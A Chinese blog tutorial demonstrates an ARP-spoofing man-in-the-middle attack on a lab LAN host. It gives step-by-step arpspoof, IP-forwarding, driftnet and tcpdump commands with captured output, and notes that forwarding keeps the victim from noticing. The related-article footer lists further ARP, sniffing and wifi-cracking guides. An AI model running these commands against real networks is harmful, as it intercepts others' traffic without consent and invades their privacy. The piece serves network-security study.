使用Arp欺骗与driftnet工具监听局域网信息

最新推荐文章于 2024-06-13 09:01:52 发布
最新推荐文章于 2024-06-13 09:01:52 发布
阅读量4.4k 收藏 27
点赞数 2
分类专栏: Linux ARP欺骗 网络安全 文章标签: Linux ARP欺骗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33571718/article/details/99684525
版权
Linux 同时被 3 个专栏收录
38 篇文章 4 订阅
订阅专栏
网络安全
4 篇文章 0 订阅
订阅专栏
ARP欺骗
1 篇文章 0 订阅
订阅专栏

【重点声明】此系列仅用于工作和学习,禁止用于非法攻击,非法传播。一切遵守《网络安全法》

环境: Ubuntu 16.0.4攻击主机:192.168.1.130,Windows10 目标机:192.168.1.219

扫描该网段存活的主机:

nmap -sP 192.168.1.1/24

测试前,可以先看一下两台机器网络是否相同,是否可以连通外网;如图:

1.ARP欺骗:

a.检测目标机arp缓存:arp -a #这里只是测试,实际可以不用做

b. 在攻击主机中安装arpspoof:apt install dsniff #这个里面有arpspoof工具

root# arpspoof -i eth0 -t 192.168.1.219 192.168.1.1
20:90:27:f8:36:23 e8:6a:64:20:50:a0 0806 42: arp reply 192.168.1.1 is-at 20:90:27:f8:36:23
20:90:27:f8:36:23 e8:6a:64:20:50:a0 0806 42: arp reply 192.168.1.1 is-at 20:90:27:f8:36:23

c.再次检测目标主机arp缓存:arp -a

 

可以看到网关192.168.1.1的物理地址变为了192.168.1.130的物理地址

在目标机中 ping网关192.168.1.1,结果显示不能ping通,同样的ping 外网www.163.com同样不能

 

为了能使目标机,经过arp欺骗后能够继续上网(不能上网,别人就发现问题了),继续第2步

2.在攻击主机中开启IP转发

a.在攻击主机中,检测是否开启IP转发:

#检测
root# sysctl -p #如果没有net.ipv4.ip_forward = 1 则说明没有开启
#开启
root# vim /etc/sysctl.conf
#找到#net.ipv4.ip_forward=1 将前面的注释去掉 然后保存退出
#再次检测
root# sysctl -p
net.ipv4.ip_forward = 1

b.检测目标机网络状况

接下来,获取目标机通讯信息 

3.利用driftnet、工具,可以捕获目标机正在访问的数据信息

a.攻击主机中安装driftnet:

apt install driftnet

b.利用driftnet捕获目标机正在浏览的图片

root# driftnet -i eth0
#因为我这里没有图形界面,所以会报如下错误:
(driftnet:4400): Gtk-WARNING **: cannot open display:

c.利用tcpdump监听目标主机的数据包信息

root# tcpdump -i eth0 -nn 'host 192.168.1.219'

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
20:48:02.077314 IP 192.168.1.219.54428 > 116.211.189.139.5390: Flags [P.], seq 3237134400:3237134438, ack 3786042730, win 258, length 38
20:48:02.077329 IP 192.168.1.219.54428 > 116.211.189.139.5390: Flags [P.], seq 0:38, ack 1, win 258, length 38
20:48:03.568159 ARP, Reply 192.168.1.1 is-at 20:90:27:f8:36:23, length 28
20:48:04.077423 IP 192.168.1.219.54428 > 116.211.189.139.5390: Flags [P.], seq 38:76, ack 1, win 258, length 38
20:48:04.077437 IP 192.168.1.219.54428 > 116.211.189.139.5390: Flags [P.], seq 38:76, ack 1, win 258, length 38
20:48:04.709417 IP 192.168.1.219.54548 > 216.58.200.238.443: Flags [S], seq 3083317889, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
20:48:04.709433 IP 192.168.1.219.54548 > 216.58.200.238.443: Flags [S], seq 3083317889, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
20:48:05.253594 IP 192.168.1.219.54705 > 59.36.119.81.8000: UDP, length 39
20:48:05.253608 IP 192.168.1.219.54705 > 59.36.119.81.8000: UDP, length 39
20:48:05.552458 IP 192.168.1.219.54531 > 14.215.178.14.443: Flags [P.], seq 700303212:700304177, ack 2485125277, win 65044, length 965
20:48:05.552470 IP 192.168.1.219.54531 > 14.215.178.14.443: Flags [P.], seq 0:965, ack 1, win 65044, length 965
20:48:05.568297 ARP, Reply 192.168.1.1 is-at 20:90:27:f8:36:23, length 28
20:48:05.579559 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [S], seq 2008324486, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
20:48:05.579571 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [S], seq 2008324486, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
20:48:05.588161 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [.], ack 1763802312, win 256, length 0
20:48:05.588172 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [.], ack 1, win 256, length 0
20:48:05.589205 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 0:517, ack 1, win 256, length 517
20:48:05.589216 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 0:517, ack 1, win 256, length 517
20:48:05.601959 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 517:560, ack 143, win 255, length 43
20:48:05.601970 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 517:560, ack 143, win 255, length 43
20:48:05.602521 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 560:645, ack 143, win 255, length 85
20:48:05.602532 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 560:645, ack 143, win 255, length 85
20:48:05.603769 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 645:1308, ack 143, win 255, length 663
20:48:05.603781 IP 192.168.1.219.54559 > 14.152.86.37.443: Flags [P.], seq 645:1308, ack 143, win 255, length 663

 

_Hebrew
关注
  • 2
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
网络安全实战(一)ARP欺骗
weixin_42474227的博客
12-30 4210
网络安全实战(一)ARP欺骗
ArpSpoof-arp欺骗.rar
04-03
arp欺骗工具,windows系统使用
断网攻击与监听演示!
wuli1024的博客
01-17 1233
下面的演示实验将使用网关型欺骗的ARP欺骗攻击,通过欺骗受害PC主机/手机,将局域网的网关地址设置为Kali主机的IP地址, 使目标主机认为攻击者的网卡是网关,从而将数据包都发给攻击者的网卡,如果攻击者直接将数据包丢弃(不开启转发),即是断网攻击。
网络安全 - ARP 欺骗原理+实验
最新发布
z339521的博客
06-13 2502
APRAPR(Address Resolution Protocol)即地址解析协议,负责将某个 IP 地址解析成对应的 MAC 地址。在网络通信过程中会使用到这两种地址,逻辑 IP 地址和物理 MAC 地址,一般情况下,正常通信需要这两种地址协同工作。一个主机要和另一个主机进行直接通信,必须要知道目标主机的 MAC 地址。但这个目标 MAC 地址是如何获得的呢?就是需要通过 ARP 协议获得的。
ARP命令详解和解决ARP攻击
wping11的专栏
05-30 3547
ARP命令详解和解决ARP攻击 显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。 语法 arp[-a [InetAddr] [-N IfaceAddr]] [-g [I
linux如何ARP嗅探 Linux下嗅探工具Dsniff安装记录
weixin_33908217的博客
09-20 787
  先来下载依赖包 和一些必须要用到的工具 我这里用的是 dsniff-2.3 的版本 wget http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz wget http://www.8090sec.com/uploads/soft/dsniff-2.3.tar.gz 备用下载 一、安装gcc # yum -y ins...
ARP监控工具ARPalert
weixin_34321753的博客
11-15 160
2019独角兽企业重金招聘Python工程师标准>>> ...
ARP断网攻击与监听
weixin_56956399的博客
04-12 4449
ARP断网攻击与监听 ARP欺骗获取图片
ARP欺骗局域网内拦截和窃听他人通讯
define_us的专栏
09-06 1789
使用jpcap。下载链接为http://pan.baidu.com/s/1jG5wLHs。内含对应的jar和dll。 配置方法: 在windows 64位中(amd 和英特尔均可),下载jpcap安装包。需要提前安装winpcap。 配置Jpcap路径:这一步也是最重要的一步。具体路径为,把Jpcap文件夹下lib文件夹里的Jpcap.dll复制到"C:\Program Files\Ja
driftnet-master.zip
06-03
这个工具的设计初衷是为了将网络上的无意义比特流转化为可感知的视觉信息,让使用者能够直观地看到网络活动的一部分。driftnet的名字来源于海洋生物学中的漂流网,这种网通常用来捕捉表面漂浮的海洋生物,driftnet...
解决ARP欺骗导致小区用户无法上网
09-16
解决ARP欺骗导致小区用户无法上网,pdf格式
arpspoof-master
06-14
arpspoofLinux下的一款局域网欺骗工具,可以使用它对局域网进行断网攻击,获取信息
ARP监听 ARP欺骗
06-20
ARP 监听 欺骗 ARP监听 ARP欺骗 以太网的ARP监听 以太网的ARP欺骗 Ethernet arp监听 Ethernet arp欺骗 ARP 监听 欺骗 ARP监听 ARP欺骗 以太网的ARP监听 以太网的ARP欺骗 Ethernet arp监听 Ethernet arp欺骗
driftnet:Driftnet监视网络流量,并挑选并显示JPEG和GIF图像进行显示
05-12
Driftnet监视网络流量,并选择并显示JPEG,GIF和其他图像格式进行显示。 这是对隐私的严重侵犯,任何地方的任何人都不应使用它。 它还可以从网络中提取MPEG音频数据并进行播放。 如果您住在一堵墙厚的房屋中,这...
Kali局域网嗅探和断网拦截
08-31
在 Kali Linux 中,我们可以使用各种工具来嗅探和拦截局域网中的流量。下面我们将介绍如何使用 Kali Linux 实现局域网嗅探和断网拦截。 一、获取本机 IP 和网卡信息 在开始嗅探和拦截之前,我们需要先获取本机的 ...
OxHoA:基于Driftnet的网络Priv8图像捕获
05-16
总的来说,"OxHoA"项目为网络流量分析提供了一个实用的工具,通过Python和Driftnet,用户可以深入理解网络中传输的图像信息,这在网络安全研究、监控以及教学中具有广泛的应用价值。对于想要学习网络数据捕获和分析...
ARP实现窃听密码
o3Ev的博客
04-08 485
ARP实现窃听密码 先附上我之前的两篇关于ARP的文章,大家可以先去看看 ARP1 , ARP2 这里就直接准备实验环境了: 1台kali 1台win10主机 攻击流程: 首先在kali里输入ifconfig,得到kali的ip地址 然后继续输入:route -n,得到当前网关地址,我这里为192.168.0.1 然后在win10主机上输入ipconfig,得到win10的ip地址,我现在的是192.168.0.2 这时他们都处于同一局域网下,可以进行ARP攻击,我们在kali里输入: a
Wifi密码破解与局域网抓包监听(小白--纯工具版)
热门推荐
Programmer Training
07-10 15万+
工具介绍: 1,wifi密码破解:CDlinux.iso  :一个Linux系统,集成了wifi密码的PIN码破解软件。 2,Mac地址修改器:修改自己的MAC地址,防止被封 3,ettercap 4,wireshark 5,
局域网监听的原理、实现与防范
陈庆霆技术专栏
08-21 3851
一、引言         随着计算机技术的发展,网络已日益成为生活中不可或缺的工具,但随之而来的非法入侵也一直威胁着计算机网络系统的安全。由于局域网中采用广播方式,因此,在某个广播域中可以监听到所有的信息包。而黑客通过对信息包进行分析,就能获取局域网上传输的一些重要信息。事实上,很多黑客入侵时都把局域网扫描和监听作为其最基本的步骤和手段,原因是想用这种方法获取想要的密码等信息。但另一方面,我们对
kali arp欺骗工具
05-22
Kali Linux是一种流行的Linux发行版,通常用于网络安全测试和渗透测试。其中含有许多网络安全工具,包括...需要注意的是,ARP欺骗工具可以被用于攻击目标网络,因此在使用这些工具时,应该遵循合法的道德和法律标准。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值